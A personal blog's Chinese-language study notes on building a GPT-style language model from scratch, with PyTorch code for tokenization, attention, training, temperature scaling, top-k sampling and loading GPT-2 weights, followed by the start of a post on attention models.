LI’s personal homepage

Build Large Language Model

2025-03-13T00:00:00+00:00

阅读图书Build Large Language Model

查看Notion版本的发布网站

日期: 2025年2月9日 → 2025年2月28日状态: 进行中

AI 安全

注意力机制

https://blog.csdn.net/weixin_42110638/article/details/134011134

深度解析注意力机制

https://mp.weixin.qq.com/s/Qlf33S3UkxO8Kui1XfH_Fg

蒸馏算法，使用大模型训练出小模型，大模型在给小模型训练时候会给出正确数据的同时会给出极小概率的其他可能性，比如在识别手写2图片时候，在告诉这个是2的同时会给他0.00001的可能性为3，0.00000001可能性为7，在小模型没有遇到过3，7的情况下也有可能识别出来这个是3，7.这个就可以提高模型泛化，同时由大模型训练出的小模型比单独训练的小模型准确率要好。

对这个方向研究在IDS上的运用。尝试研究。

开始

第2章 Working with Text Data

介绍从text数据转化为token_id的过程，介绍原理。可以直接使用

import tiktoken 
 
tokenizer = tiktoken.get_encoding("gpt2")

文本到数值向量的转换：LLMs无法直接处理原始文本，因此需要将文本转换为数值向量（嵌入）。嵌入将离散数据（如单词或图像）转换为连续的向量空间，使其适用于神经网络操作。
分词与标记化：首先，原始文本被分解为标记（tokens），标记可以是单词或字符。然后，这些标记被转换为整数表示，称为标记ID。
特殊标记：为了增强模型的理解能力，可以添加特殊标记（如<|unk|>表示未知单词，<|endoftext|>表示文本结束），以处理不同上下文。
字节对编码（BPE）：GPT-2和GPT-3等模型使用BPE分词器，能够通过将未知单词分解为子词单元或单个字符来高效处理它们。
滑动窗口方法：在训练LLMs时，使用滑动窗口方法在标记化数据上生成输入-目标对。
嵌入层：在PyTorch中，嵌入层通过查找操作检索与标记ID对应的向量，生成连续的标记表示，这对训练深度学习模型至关重要。
位置嵌入：为了表示标记在序列中的位置，有两种主要的位置嵌入方法：绝对位置嵌入和相对位置嵌入。OpenAI的GPT模型使用绝对位置嵌入，将其添加到标记嵌入向量中，并在模型训练过程中进行优化。

第3章 Coding Attention Mechanisms

主要介绍了注意力机制及其在大型语言模型（LLMs）中的应用

注意力机制的作用：注意力机制将输入元素转换为增强的上下文向量表示，这些表示包含了所有输入的信息。
自注意力机制：自注意力机制通过计算输入元素的加权和来生成上下文向量表示。在简化的注意力机制中，注意力权重通过点积计算。
点积与矩阵乘法：点积是对两个向量逐元素相乘后求和，矩阵乘法可以高效地替代嵌套循环，使计算更紧凑和高效。
缩放点积注意力：LLMs中使用的自注意力机制（称为缩放点积注意力）引入了可训练的权重矩阵，用于计算输入的中间变换：查询（queries）、值（values）和键（keys）。
因果注意力掩码(causal attention mask)：在从左到右生成文本的LLMs中，使用因果注意力掩码来防止模型访问未来的标记（tokens）。
Dropout掩码：除了因果注意力掩码，还可以添加Dropout掩码以减少LLMs的过拟合。
多头注意力：基于Transformer的LLMs使用多头注意力机制，即多个因果注意力模块的堆叠。通过批处理矩阵乘法可以更高效地实现多头注意力模块。

第4章Implementing a GPT model from Scratch To Generate Text

说明GPT模型的核心组件（如层归一化、快捷连接和Transformer块）、模型规模以及文本生成的基本原理，同时强调了模型训练的关键作用

层归一化（Layer Normalization）：通过确保每一层的输出具有一致的均值和方差，层归一化能够稳定训练过程。

 class LayerNorm(nn.Module):
     def __init__(self, emb_dim):
         super().__init__()
         self.eps = 1e-5
         self.scale = nn.Parameter(torch.ones(emb_dim))
         self.shift = nn.Parameter(torch.zeros(emb_dim))
    
     def forward(self, x):
         mean = x.mean(dim=-1, keepdim=True)
         var = x.var(dim=-1, keepdim=True, unbiased=False)
         norm_x = (x - mean) / torch.sqrt(var + self.eps)
         return self.scale * norm_x + self.shift

forward network

使用GELU activations而不是ReLU activations防止梯度消失

快捷连接（Shortcut Connections）：快捷连接通过将某一层的输出直接传递到更深的层，跳过一个或多个层，从而缓解深度神经网络（如LLMs）训练中的梯度消失问题。

在深层网络中，梯度在反向传播时需要通过多个层逐层传递。如果每一层的梯度值较小，经过多层传递后，梯度可能会变得非常小，甚至趋近于零（梯度消失）。
快捷连接通过跳过某些层，为梯度提供了一条直接的传播路径，使得梯度能够更高效地传递到浅层网络，避免因多层传递而导致的梯度衰减。

 class ExampleDeepNeuralNetwork(nn.Module):
     def __init__(self, layer_sizes, use_shortcut):
         super().__init__()
         self.use_shortcut = use_shortcut
         self.layers = nn.ModuleList([
             nn.Sequential(nn.Linear(layer_sizes[0], layer_sizes[1]), GELU()),
             nn.Sequential(nn.Linear(layer_sizes[1], layer_sizes[2]), GELU()),
             nn.Sequential(nn.Linear(layer_sizes[2], layer_sizes[3]), GELU()),
             nn.Sequential(nn.Linear(layer_sizes[3], layer_sizes[4]), GELU()),
             nn.Sequential(nn.Linear(layer_sizes[4], layer_sizes[5]), GELU())
         ])
    
     def forward(self, x):
         for layer in self.layers:
             # Compute the output of the current layer
             layer_output = layer(x)
             # Check if shortcut can be applied
             if self.use_shortcut and x.shape == layer_output.shape:
                 x = x + layer_output
             else:
                 x = layer_output
         return x
    
 def print_gradients(model, x):
     # Forward pass
     output = model(x)
     target = torch.tensor([[0.]])
    
     # Calculate loss based on how close the target
     # and output are
     loss = nn.MSELoss()
     loss = loss(output, target)
        
     # Backward pass to calculate the gradients
     loss.backward()
    
     for name, param in model.named_parameters():
         if 'weight' in name:
             # Print the mean absolute gradient of the weights
             print(f"{name} has gradient mean of {param.grad.abs().mean().item()}")

Transformer块：Transformer块是GPT模型的核心结构组件，结合了掩码多头注意力模块和全连接的前馈神经网络（使用GELU激活函数）。

    
 class TransformerBlock(nn.Module):
     def __init__(self, cfg):
         super().__init__()
         self.att = MultiHeadAttention(
             d_in=cfg["emb_dim"],
             d_out=cfg["emb_dim"],
             context_length=cfg["context_length"],
             num_heads=cfg["n_heads"], 
             dropout=cfg["drop_rate"],
             qkv_bias=cfg["qkv_bias"])
         self.ff = FeedForward(cfg)
         self.norm1 = LayerNorm(cfg["emb_dim"])
         self.norm2 = LayerNorm(cfg["emb_dim"])
         self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
    
     def forward(self, x):
         # Shortcut connection for attention block
         shortcut = x
         x = self.norm1(x)
         x = self.att(x)  # Shape [batch_size, num_tokens, emb_size]
         x = self.drop_shortcut(x)
         x = x + shortcut  # Add the original input back
    
         # Shortcut connection for feed forward block
         shortcut = x
         x = self.norm2(x)
         x = self.ff(x)
         x = self.drop_shortcut(x)
         x = x + shortcut  # Add the original input back
    
         return x

GPT模型：GPT模型是由多个重复的Transformer块组成的大型语言模型（LLMs），参数规模从数百万到数十亿不等。不同规模的GPT模型（如1.24亿、3.45亿、7.62亿和15.42亿参数）可以使用相同的Python类（如GPTModel）实现。

 class GPTModel(nn.Module):
     def __init__(self, cfg):
         super().__init__()
         self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
         self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
         self.drop_emb = nn.Dropout(cfg["drop_rate"])
            
         self.trf_blocks = nn.Sequential(
             *[TransformerBlock(cfg) for _ in range(cfg["n_layers"])])
            
         self.final_norm = LayerNorm(cfg["emb_dim"])
         self.out_head = nn.Linear(
             cfg["emb_dim"], cfg["vocab_size"], bias=False
         )
    
     def forward(self, in_idx):
         batch_size, seq_len = in_idx.shape
         tok_embeds = self.tok_emb(in_idx)
         pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device))
         x = tok_embeds + pos_embeds  # Shape [batch_size, num_tokens, emb_size]
         x = self.drop_emb(x)
         x = self.trf_blocks(x)
         x = self.final_norm(x)
         logits = self.out_head(x)
         return logits

文本生成：GPT模型的文本生成能力涉及将输出张量解码为人类可读的文本，基于给定的输入上下文逐词预测。未经训练的GPT模型会生成不连贯的文本，这凸显了模型训练对于生成连贯文本的重要性。

 def generate_text_simple(model, idx, max_new_tokens, context_size):
     # idx is (batch, n_tokens) array of indices in the current context
     for _ in range(max_new_tokens):
            
         # Crop current context if it exceeds the supported context size
         # E.g., if LLM supports only 5 tokens, and the context size is 10
         # then only the last 5 tokens are used as context
         idx_cond = idx[:, -context_size:]
            
         # Get the predictions
         with torch.no_grad():
             logits = model(idx_cond)
            
         # Focus only on the last time step
         # (batch, n_tokens, vocab_size) becomes (batch, vocab_size)
         logits = logits[:, -1, :]  
    
         # Apply softmax to get probabilities
         probas = torch.softmax(logits, dim=-1)  # (batch, vocab_size)
    
         # Get the idx of the vocab entry with the highest probability value
         idx_next = torch.argmax(probas, dim=-1, keepdim=True)  # (batch, 1)
    
         # Append sampled index to the running sequence
         idx = torch.cat((idx, idx_next), dim=1)  # (batch, n_tokens+1)
    
     return idx
     
  start_context = "Hello, I am"
    
 encoded = tokenizer.encode(start_context)
 print("encoded:", encoded)
    
 encoded_tensor = torch.tensor(encoded).unsqueeze(0)
 print("encoded_tensor.shape:", encoded_tensor.shape)
 model.eval() # disable dropout
    
 out = generate_text_simple(
     model=model,
     idx=encoded_tensor, 
     max_new_tokens=6, 
     context_size=GPT_CONFIG_124M["context_length"]
 )
    
 print("Output:", out)
 print("Output length:", len(out[0]))
 decoded_text = tokenizer.decode(out.squeeze(0).tolist())
 print(decoded_text)
 `Hello, I am Featureiman Byeswickattribute argue`

第5章 Pretraining on Unlabeled Data

Evaluating generative text models

import os
import urllib.request

file_path = "the-verdict.txt"
url = "https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt"

if not os.path.exists(file_path):
    with urllib.request.urlopen(url) as response:
        text_data = response.read().decode('utf-8')
    with open(file_path, "w", encoding="utf-8") as file:
        file.write(text_data)
else:
    with open(file_path, "r", encoding="utf-8") as file:
        text_data = file.read()
from previous_chapters import create_dataloader_v1

# Train/validation ratio
train_ratio = 0.90
split_idx = int(train_ratio * len(text_data))
train_data = text_data[:split_idx]
val_data = text_data[split_idx:]

torch.manual_seed(123)

train_loader = create_dataloader_v1(
    train_data,
    batch_size=2,
    max_length=GPT_CONFIG_124M["context_length"],
    stride=GPT_CONFIG_124M["context_length"],
    drop_last=True,
    shuffle=True,
    num_workers=0
)

val_loader = create_dataloader_v1(
    val_data,
    batch_size=2,
    max_length=GPT_CONFIG_124M["context_length"],
    stride=GPT_CONFIG_124M["context_length"],
    drop_last=False,
    shuffle=False,
    num_workers=0
)
# Sanity check

if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]:
    print("Not enough tokens for the training loader. "
          "Try to lower the `GPT_CONFIG_124M['context_length']` or "
          "increase the `training_ratio`")

if total_tokens * (1-train_ratio) < GPT_CONFIG_124M["context_length"]:
    print("Not enough tokens for the validation loader. "
          "Try to lower the `GPT_CONFIG_124M['context_length']` or "
          "decrease the `training_ratio`")

def calc_loss_batch(input_batch, target_batch, model, device):
    input_batch, target_batch = input_batch.to(device), target_batch.to(device)
    logits = model(input_batch)
    loss = torch.nn.functional.cross_entropy(logits.flatten(0, 1), target_batch.flatten())
    return loss

def calc_loss_loader(data_loader, model, device, num_batches=None):
    total_loss = 0.
    if len(data_loader) == 0:
        return float("nan")
    elif num_batches is None:
        num_batches = len(data_loader)
    else:
        # Reduce the number of batches to match the total number of batches in the data loader
        # if num_batches exceeds the number of batches in the data loader
        num_batches = min(num_batches, len(data_loader))
    for i, (input_batch, target_batch) in enumerate(data_loader):
        if i < num_batches:
            loss = calc_loss_batch(input_batch, target_batch, model, device)
            total_loss += loss.item()
        else:
            break
    return total_loss / num_batches
    
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")

# Note:
# Uncommenting the following lines will allow the code to run on Apple Silicon chips, if applicable,
# which is approximately 2x faster than on an Apple CPU (as measured on an M3 MacBook Air).
# However, the resulting loss values may be slightly different.

#if torch.cuda.is_available():
#    device = torch.device("cuda")
#elif torch.backends.mps.is_available():
#    device = torch.device("mps")
#else:
#    device = torch.device("cpu")
#
# print(f"Using {device} device.")

model.to(device) # no assignment model = model.to(device) necessary for nn.Module classes

torch.manual_seed(123) # For reproducibility due to the shuffling in the data loader

with torch.no_grad(): # Disable gradient tracking for efficiency because we are not training, yet
    train_loss = calc_loss_loader(train_loader, model, device)
    val_loss = calc_loss_loader(val_loader, model, device)

print("Training loss:", train_loss)
print("Validation loss:", val_loss)

训练模型

def train_model_simple(model, train_loader, val_loader, optimizer, device, num_epochs,
                       eval_freq, eval_iter, start_context, tokenizer):
    # Initialize lists to track losses and tokens seen
    train_losses, val_losses, track_tokens_seen = [], [], []
    tokens_seen, global_step = 0, -1

    # Main training loop
    for epoch in range(num_epochs):
        model.train()  # Set model to training mode
        
        for input_batch, target_batch in train_loader:
            optimizer.zero_grad() # Reset loss gradients from previous batch iteration
            loss = calc_loss_batch(input_batch, target_batch, model, device)
            loss.backward() # Calculate loss gradients
            optimizer.step() # Update model weights using loss gradients
            tokens_seen += input_batch.numel()
            global_step += 1

            # Optional evaluation step
            if global_step % eval_freq == 0:
                train_loss, val_loss = evaluate_model(
                    model, train_loader, val_loader, device, eval_iter)
                train_losses.append(train_loss)
                val_losses.append(val_loss)
                track_tokens_seen.append(tokens_seen)
                print(f"Ep {epoch+1} (Step {global_step:06d}): "
                      f"Train loss {train_loss:.3f}, Val loss {val_loss:.3f}")

        # Print a sample text after each epoch
        generate_and_print_sample(
            model, tokenizer, device, start_context
        )

    return train_losses, val_losses, track_tokens_seen

def evaluate_model(model, train_loader, val_loader, device, eval_iter):
    model.eval()
    with torch.no_grad():
        train_loss = calc_loss_loader(train_loader, model, device, num_batches=eval_iter)
        val_loss = calc_loss_loader(val_loader, model, device, num_batches=eval_iter)
    model.train()
    return train_loss, val_loss

def generate_and_print_sample(model, tokenizer, device, start_context):
    model.eval()
    context_size = model.pos_emb.weight.shape[0]
    encoded = text_to_token_ids(start_context, tokenizer).to(device)
    with torch.no_grad():
        token_ids = generate_text_simple(
            model=model, idx=encoded,
            max_new_tokens=50, context_size=context_size
        )
    decoded_text = token_ids_to_text(token_ids, tokenizer)
    print(decoded_text.replace("\n", " "))  # Compact print format
    model.train()

# Note:
# Uncomment the following code to calculate the execution time
# import time
# start_time = time.time()

torch.manual_seed(123)
model = GPTModel(GPT_CONFIG_124M)
model.to(device)
optimizer = torch.optim.AdamW(model.parameters(), lr=0.0004, weight_decay=0.1)

num_epochs = 10
train_losses, val_losses, tokens_seen = train_model_simple(
    model, train_loader, val_loader, optimizer, device,
    num_epochs=num_epochs, eval_freq=5, eval_iter=5,
    start_context="Every effort moves you", tokenizer=tokenizer
)

# Note:
# Uncomment the following code to show the execution time
# end_time = time.time()
# execution_time_minutes = (end_time - start_time) / 60
# print(f"Training completed in {execution_time_minutes:.2f} minutes.")

Temperature Scaling

Temperature Scaling（温度缩放） 是一种用于校准深度学习模型（尤其是分类模型）输出概率的技术。它通常用于提高模型预测概率的可靠性，使其更接近真实概率分布。温度缩放是 模型校准（Model Calibration） 的一种简单而有效的方法。

1. 背景：模型校准问题

在分类任务中，深度学习模型通常会输出每个类别的概率（通过 softmax 函数）。然而，这些概率并不总是准确的，尤其是当模型过于自信或不够自信时：

过度自信：模型输出的概率值过高（例如，预测某个类别的概率为 0.99，但实际上并不准确）。
不够自信：模型输出的概率值过低（例如，预测某个类别的概率为 0.6，但实际上应该更高）。

模型校准的目标是调整模型的输出概率，使其更接近真实概率分布。

2. 温度缩放的原理

温度缩放通过在 softmax 函数中引入一个 温度参数 ( T ) 来调整模型的输出概率。具体来说，softmax 函数的公式被修改为：

[ \text{softmax}(z_i) = \frac{e^{z_i / T}}{\sum_{j=1}^N e^{z_j / T}} ]

其中：

( z_i ) 是模型对第 ( i ) 个类别的 logit（未归一化的预测值）。
( T ) 是温度参数。
( N ) 是类别的总数。

温度参数 ( T ) 的作用：

( T = 1 )：这是标准的 softmax 函数，不进行任何调整。
( T > 1 )：增大温度会使得输出概率分布更加平滑，降低模型的置信度（概率值更接近均匀分布）。
( T < 1 )：减小温度会使得输出概率分布更加尖锐，增加模型的置信度（概率值更接近 0 或 1）。

3. 温度缩放的实现

温度缩放的实现非常简单，通常包括以下步骤：

在验证集上训练一个温度参数 ( T )。
将训练好的 ( T ) 应用于测试集或实际推理中，调整模型的输出概率。

代码示例：

import torch
import torch.nn.functional as F

# 假设模型的 logits 输出
logits = torch.tensor([[2.0, 1.0, 0.1]])

# 标准 softmax（T=1）
probs = F.softmax(logits, dim=-1)
print("Standard softmax:", probs)  # 输出: tensor([[0.6590, 0.2424, 0.0986]])

# 温度缩放（T=2）
T = 2
scaled_probs = F.softmax(logits / T, dim=-1)
print("Temperature scaled (T=2):", scaled_probs)  # 输出: tensor([[0.5423, 0.3380, 0.1197]])

# 温度缩放（T=0.5）
T = 0.5
scaled_probs = F.softmax(logits / T, dim=-1)
print("Temperature scaled (T=0.5):", scaled_probs)  # 输出: tensor([[0.7489, 0.2100, 0.0411]])

输出结果：

当 ( T = 2 ) 时，概率分布更加平滑，模型的置信度降低。
当 ( T = 0.5 ) 时，概率分布更加尖锐，模型的置信度增加。

4. 如何选择温度参数 ( T )

温度参数 ( T ) 通常通过在验证集上优化来获得。具体步骤如下：

在验证集上计算模型的 logits 和真实标签。
使用优化方法（如梯度下降）最小化负对数似然损失（Negative Log-Likelihood, NLL），找到最佳的 ( T )。

代码示例：

# 假设验证集的 logits 和标签
val_logits = torch.tensor([[2.0, 1.0, 0.1], [1.0, 2.0, 0.1]])
val_labels = torch.tensor([0, 1])  # 真实标签

# 定义温度参数 T（初始值为 1.0）
T = torch.tensor(1.0, requires_grad=True)

# 优化器
optimizer = torch.optim.LBFGS([T], lr=0.01)

# 优化过程
def eval():
    optimizer.zero_grad()
    loss = F.cross_entropy(val_logits / T, val_labels)
    loss.backward()
    return loss

optimizer.step(eval)

print("Optimized T:", T.item())  # 输出优化后的温度参数

5. 温度缩放的应用场景

模型校准：提高模型输出概率的可靠性，使其更接近真实概率分布。
不确定性估计：在需要模型输出不确定性时（如医疗诊断、自动驾驶等），温度缩放可以帮助更好地量化模型的不确定性。
集成方法：在模型集成（Ensemble）中，温度缩放可以用于调整每个子模型的输出概率。

6. 温度缩放的优缺点

优点：

简单易实现，只需一个额外的参数 ( T )。
计算开销小，适用于大规模模型。
可以有效提高模型的校准性能。

缺点：

只能调整概率分布的平滑度，无法改变模型的排序能力（即模型的预测顺序不变）。
对于某些复杂任务，可能需要更复杂的校准方法。

总结

温度缩放 是一种简单而有效的模型校准技术，通过调整 softmax 函数中的温度参数 ( T ) 来优化模型的输出概率。
它广泛应用于分类任务中，尤其是在需要可靠概率估计的场景（如医疗、金融等）。
温度缩放的实现非常简单，且计算开销小，是模型校准的首选方法之一。

如果你有更多问题，欢迎继续讨论！

Top-k Sampling

Top-k Sampling（Top-k 采样） 是一种用于生成文本的采样策略，通常用于语言模型（如 GPT 等）的文本生成任务中。它的核心思想是从模型预测的概率分布中，选择概率最高的前 ( k ) 个词（或标记，token），然后从这 ( k ) 个词中进行采样，而不是从整个词汇表中采样。

1. 背景：文本生成中的采样问题

在文本生成任务中，语言模型会输出一个概率分布，表示每个词（或标记）作为下一个词的可能性。传统的采样方法（如贪心搜索或随机采样）存在以下问题：

贪心搜索（Greedy Search）：总是选择概率最高的词，容易导致生成的文本过于单调和重复。
随机采样（Random Sampling）：从整个词汇表中随机采样，可能会导致生成不连贯或不符合语境的文本。

Top-k 采样是一种折衷方法，既避免了贪心搜索的单调性，又减少了随机采样的不确定性。

2. Top-k 采样的原理

Top-k 采样的核心思想是：

从模型输出的概率分布中，选择概率最高的前 ( k ) 个词。
对这 ( k ) 个词的概率重新归一化（使其和为 1）。
从这 ( k ) 个词中随机采样一个词作为下一个词。

数学公式：

假设模型输出的概率分布为 ( P(x) )，Top-k 采样的步骤如下：

选择概率最高的前 ( k ) 个词，记为 ( V_{\text{top-k}} )。
重新归一化概率： [ P_{\text{top-k}}(x) = \begin{cases} \frac{P(x)}{\sum_{x’ \in V_{\text{top-k}}} P(x’)} & \text{if } x \in V_{\text{top-k}}
0 & \text{otherwise} \end{cases} ]
从 ( P_{\text{top-k}}(x) ) 中随机采样一个词。

3. Top-k 采样的实现

以下是一个简单的 Python 实现示例：

import torch
import torch.nn.functional as F

def top_k_sampling(logits, k):
    # logits: 模型输出的未归一化概率分布，形状为 (vocab_size,)
    # k: 选择前 k 个词
    probs = F.softmax(logits, dim=-1)  # 将 logits 转换为概率分布
    top_k_probs, top_k_indices = torch.topk(probs, k)  # 选择前 k 个词的概率和索引
    top_k_probs = top_k_probs / top_k_probs.sum()  # 重新归一化
    sampled_index = torch.multinomial(top_k_probs, num_samples=1)  # 从 top-k 中采样
    return top_k_indices[sampled_index]  # 返回采样的词索引

示例：

# 假设模型输出的 logits
logits = torch.tensor([1.0, 2.0, 3.0, 4.0, 5.0])

# 使用 Top-k 采样（k=3）
sampled_index = top_k_sampling(logits, k=3)
print("Sampled index:", sampled_index.item())

4. Top-k 采样的优点

减少低概率词的影响：通过限制采样范围，避免选择概率极低的词，从而生成更连贯的文本。
平衡多样性和质量：相比于贪心搜索，Top-k 采样增加了文本的多样性；相比于随机采样，Top-k 采样提高了文本的质量。
简单易实现：只需一个参数 ( k )，计算开销小。

5. Top-k 采样的缺点

固定 ( k ) 的限制：
- 如果 ( k ) 设置过小，可能会导致生成的文本过于保守，缺乏多样性。
- 如果 ( k ) 设置过大，可能会引入低概率词，影响文本质量。
动态性不足：Top-k 采样对每个时间步都使用固定的 ( k )，无法根据上下文动态调整采样范围。

6. Top-k 采样的改进：Top-p（Nucleus）采样

为了克服 Top-k 采样的缺点，Top-p 采样（也称为 Nucleus 采样） 被提出。Top-p 采样不是固定选择前 ( k ) 个词，而是选择一个最小的词集合，使得这些词的概率之和大于等于 ( p )（例如 ( p = 0.9 )）。这样可以动态调整采样范围，适应不同的上下文。

7. Top-k 采样的应用场景

Top-k 采样广泛应用于以下任务：

文本生成：如故事生成、对话生成、代码生成等。
机器翻译：生成多样化的翻译结果。
语音识别：生成多样化的转录结果。

8. 总结

Top-k 采样 是一种简单而有效的文本生成采样策略，通过限制采样范围来提高生成文本的质量和多样性。
它通过选择概率最高的前 ( k ) 个词，并对这些词重新归一化后进行采样。
Top-k 采样的改进版本是 Top-p 采样，后者可以动态调整采样范围，适应不同的上下文。

如果你有更多问题，欢迎继续讨论！

加载模型Loading pretrained weights from OpenAI

def download_and_load_gpt2(model_size, models_dir):
    # Validate model size
    allowed_sizes = ("124M", "355M", "774M", "1558M")
    if model_size not in allowed_sizes:
        raise ValueError(f"Model size not in {allowed_sizes}")

    # Define paths
    model_dir = os.path.join(models_dir, model_size)
    base_url = "https://openaipublic.blob.core.windows.net/gpt-2/models"
    backup_base_url = "https://f001.backblazeb2.com/file/LLMs-from-scratch/gpt2"
    filenames = [
        "checkpoint", "encoder.json", "hparams.json",
        "model.ckpt.data-00000-of-00001", "model.ckpt.index",
        "model.ckpt.meta", "vocab.bpe"
    ]

    # Download files
    os.makedirs(model_dir, exist_ok=True)
    for filename in filenames:
        file_url = os.path.join(base_url, model_size, filename)
        backup_url = os.path.join(backup_base_url, model_size, filename)
        file_path = os.path.join(model_dir, filename)
        download_file(file_url, file_path, backup_url)

    # Load settings and params
    tf_ckpt_path = tf.train.latest_checkpoint(model_dir)
    settings = json.load(open(os.path.join(model_dir, "hparams.json")))
    params = load_gpt2_params_from_tf_ckpt(tf_ckpt_path, settings)

    return settings, params

# Define model configurations in a dictionary for compactness
model_configs = {
    "gpt2-small (124M)": {"emb_dim": 768, "n_layers": 12, "n_heads": 12},
    "gpt2-medium (355M)": {"emb_dim": 1024, "n_layers": 24, "n_heads": 16},
    "gpt2-large (774M)": {"emb_dim": 1280, "n_layers": 36, "n_heads": 20},
    "gpt2-xl (1558M)": {"emb_dim": 1600, "n_layers": 48, "n_heads": 25},
}

# Copy the base configuration and update with specific model settings
model_name = "gpt2-small (124M)"  # Example model name
NEW_CONFIG = GPT_CONFIG_124M.copy()
NEW_CONFIG.update(model_configs[model_name])
NEW_CONFIG.update({"context_length": 1024, "qkv_bias": True})

gpt = GPTModel(NEW_CONFIG)
gpt.eval();

def assign(left, right):
    if left.shape != right.shape:
        raise ValueError(f"Shape mismatch. Left: {left.shape}, Right: {right.shape}")
    return torch.nn.Parameter(torch.tensor(right))

import numpy as np

def load_weights_into_gpt(gpt, params):
    gpt.pos_emb.weight = assign(gpt.pos_emb.weight, params['wpe'])
    gpt.tok_emb.weight = assign(gpt.tok_emb.weight, params['wte'])
    
    for b in range(len(params["blocks"])):
        q_w, k_w, v_w = np.split(
            (params["blocks"][b]["attn"]["c_attn"])["w"], 3, axis=-1)
        gpt.trf_blocks[b].att.W_query.weight = assign(
            gpt.trf_blocks[b].att.W_query.weight, q_w.T)
        gpt.trf_blocks[b].att.W_key.weight = assign(
            gpt.trf_blocks[b].att.W_key.weight, k_w.T)
        gpt.trf_blocks[b].att.W_value.weight = assign(
            gpt.trf_blocks[b].att.W_value.weight, v_w.T)

        q_b, k_b, v_b = np.split(
            (params["blocks"][b]["attn"]["c_attn"])["b"], 3, axis=-1)
        gpt.trf_blocks[b].att.W_query.bias = assign(
            gpt.trf_blocks[b].att.W_query.bias, q_b)
        gpt.trf_blocks[b].att.W_key.bias = assign(
            gpt.trf_blocks[b].att.W_key.bias, k_b)
        gpt.trf_blocks[b].att.W_value.bias = assign(
            gpt.trf_blocks[b].att.W_value.bias, v_b)

        gpt.trf_blocks[b].att.out_proj.weight = assign(
            gpt.trf_blocks[b].att.out_proj.weight, 
            params["blocks"][b]["attn"]["c_proj"]["w"].T)
        gpt.trf_blocks[b].att.out_proj.bias = assign(
            gpt.trf_blocks[b].att.out_proj.bias, 
            params["blocks"][b]["attn"]["c_proj"]["b"])

        gpt.trf_blocks[b].ff.layers[0].weight = assign(
            gpt.trf_blocks[b].ff.layers[0].weight, 
            params["blocks"][b]["mlp"]["c_fc"]["w"].T)
        gpt.trf_blocks[b].ff.layers[0].bias = assign(
            gpt.trf_blocks[b].ff.layers[0].bias, 
            params["blocks"][b]["mlp"]["c_fc"]["b"])
        gpt.trf_blocks[b].ff.layers[2].weight = assign(
            gpt.trf_blocks[b].ff.layers[2].weight, 
            params["blocks"][b]["mlp"]["c_proj"]["w"].T)
        gpt.trf_blocks[b].ff.layers[2].bias = assign(
            gpt.trf_blocks[b].ff.layers[2].bias, 
            params["blocks"][b]["mlp"]["c_proj"]["b"])

        gpt.trf_blocks[b].norm1.scale = assign(
            gpt.trf_blocks[b].norm1.scale, 
            params["blocks"][b]["ln_1"]["g"])
        gpt.trf_blocks[b].norm1.shift = assign(
            gpt.trf_blocks[b].norm1.shift, 
            params["blocks"][b]["ln_1"]["b"])
        gpt.trf_blocks[b].norm2.scale = assign(
            gpt.trf_blocks[b].norm2.scale, 
            params["blocks"][b]["ln_2"]["g"])
        gpt.trf_blocks[b].norm2.shift = assign(
            gpt.trf_blocks[b].norm2.shift, 
            params["blocks"][b]["ln_2"]["b"])

    gpt.final_norm.scale = assign(gpt.final_norm.scale, params["g"])
    gpt.final_norm.shift = assign(gpt.final_norm.shift, params["b"])
    gpt.out_head.weight = assign(gpt.out_head.weight, params["wte"])
    
    
load_weights_into_gpt(gpt, params)
gpt.to(device)

torch.manual_seed(123)

token_ids = generate(
    model=gpt,
    idx=text_to_token_ids("Every effort moves you", tokenizer).to(device),
    max_new_tokens=25,
    context_size=NEW_CONFIG["context_length"],
    top_k=50,
    temperature=1.5
)

print("Output text:\n", token_ids_to_text(token_ids, tokenizer))

Output text:
 Every effort moves you toward finding an ideal new way to practice something!

What makes us want to be on top of that?

总结

LLMs的文本生成机制（贪婪解码、概率采样和温度缩放）、训练过程（损失函数和优化器）以及预训练的挑战和替代方案（使用公开的预训练权重）。这些技术和方法共同支撑了LLMs的高效训练和文本生成能力。

1. 文本生成过程

LLMs生成文本时，每次输出一个标记（token）。
默认情况下，模型通过将输出转换为概率分数，并选择概率最高的标记（称为贪婪解码，greedy decoding）来生成下一个标记。
为了提高生成文本的多样性和连贯性，可以使用概率采样（probabilistic sampling）和温度缩放（temperature scaling）。

2. 训练与验证

训练和验证集的损失值（loss）用于评估LLM在训练过程中生成的文本质量。
训练LLM的目标是通过调整模型权重来最小化训练损失。
训练过程使用标准的深度学习流程，包括交叉熵损失函数（cross entropy loss）和AdamW优化器。

3. 预训练

预训练LLM需要在一个大规模文本语料库上进行，这是一个耗时且资源密集的过程。
为了避免从头开始预训练，可以使用公开的预训练权重（如OpenAI提供的权重）作为替代方案。

总结

Attention mechanism

2025-01-13T00:00:00+00:00

PyTorch 注意力模型实现详解（以简单的机器翻译为例）

Transformer中的“注意力”最早来自于NLP里的注意力模型。通过动手实现一遍注意力模型，我们能够更深刻地理解注意力的原理，以便于学习Transformer等后续那些基于注意力的模型。在这篇文章中，我将分享如何用PyTorch的基本API实现注意力模型，完成一个简单的机器翻译项目——把各种格式的日期“翻译”成统一格式的日期。

有关机器翻译、注意力模型相关知识请参考我之前的文章。如序列模型与注意力机制。

项目网址：https://github.com/SingleZombie/DL-Demos/tree/master/dldemos/attention

知识背景

注意力模型发源自机器翻译任务。最早，基于RNN的机器翻译模型都采用如下的架构：

前半部分的RNN只有输入，后半部分的RNN只有输出。两个部分通过一个简单的隐状态来传递信息。把隐状态看成输入信息的一种编码的话，前半部分可以叫做“编码器”，后半部分可以叫做“解码器”。这种架构因而被称为“编码器-解码器”架构。

这种架构在翻译短句子时确实有效，但面对长文章时就捉襟见肘了。使用“编码器-解码器”架构时，无论输入有多长，输入都会被压缩成一个简短的编码。也就是说，模型要一次性阅读完所有输入，再一次性输出所有翻译。这显然不是一种好的方法。联想一下，我们人类在翻译时，一般会读一句话，翻译一句话，读一句话，翻译一句话。基于这种思想，有人提出了注意力模型。注意力模型能够有效地翻译长文章。

在注意力模型中，编码器和解码器以另一种方式连接在一起。在完成编码后，解码器会以不同的权重去各个编码输出中取出相关信息，也就是以不同的“注意力”去关注输入信息。

具体来说，注意力模型的结构如下。

